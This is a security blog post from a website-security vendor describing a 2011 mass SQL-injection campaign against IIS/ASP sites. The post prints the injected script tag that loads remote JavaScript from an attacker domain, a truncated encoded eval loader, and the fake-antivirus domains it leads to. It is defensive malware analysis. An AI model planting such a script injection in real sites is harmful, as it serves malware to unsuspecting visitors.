• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Mass infections from jjghui.com/urchin.js (SQL injection)

October 12, 2011David Dede

FacebookTwitterSubscribe

We are seeing many sites compromised with malware from jjghui.com/urchin.js. Most of them are IIS/ASP sites and the infection method seems to be similar to the Lizamoon mass infections from a few months ago (SQL injection).

According to Google, almost 1.5k sites have been blacklisted already due to it, and there are 80k+ pages on Google index with a JavaScript malware pointing to it.

What is interesting is that the registration information for this domain is the same as the one used on the earlier Lizamoon domains:

Technical Contact:
James Northone jamesnorthone@hotmailbox.com
+1.5168222749 fax: +1.5168222749
128 Lynn Court
Plainview NY 11803
us

This leads us to believe the same group is involved on this one as well.

Compromised sites

On all the compromised sites we analyzed, the following JavaScript was added to the database:

<script src = http://jjghui.com/urchin.js ></script>

When loaded, this loads another piece of encoded javascript:

var str=[“70124”, “70124”, “70217”, “70225”, “70209”..
..
temp= temp+String.(gg);
}
eval  ( temp );

After decoded it tries to contact http://www3.strongdefenseiz.in/ (and other domains) to push fake AV’s to the person visiting the site.

Infected sites

Any site that is compromised has to remove the infection from the database and audit their code to make sure it is free from SQL injections.

You can scan the site here to make sure it is clean (or not): https://sitecheck.sucuri.net or sign up here to get it cleaned: https://sucuri.net/signup.

We will post more updates as we go.

*Our global page lists the malware-related attack domains for the month: https://sucuri.net/global

Update: New domain name: http://nbnjkl.com/urchin.js

FacebookTwitterSubscribe

Categories: Vulnerability Disclosure, Website Malware InfectionsTags: Hacked Websites, Malware Updates, Server Security, SQL Injection

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.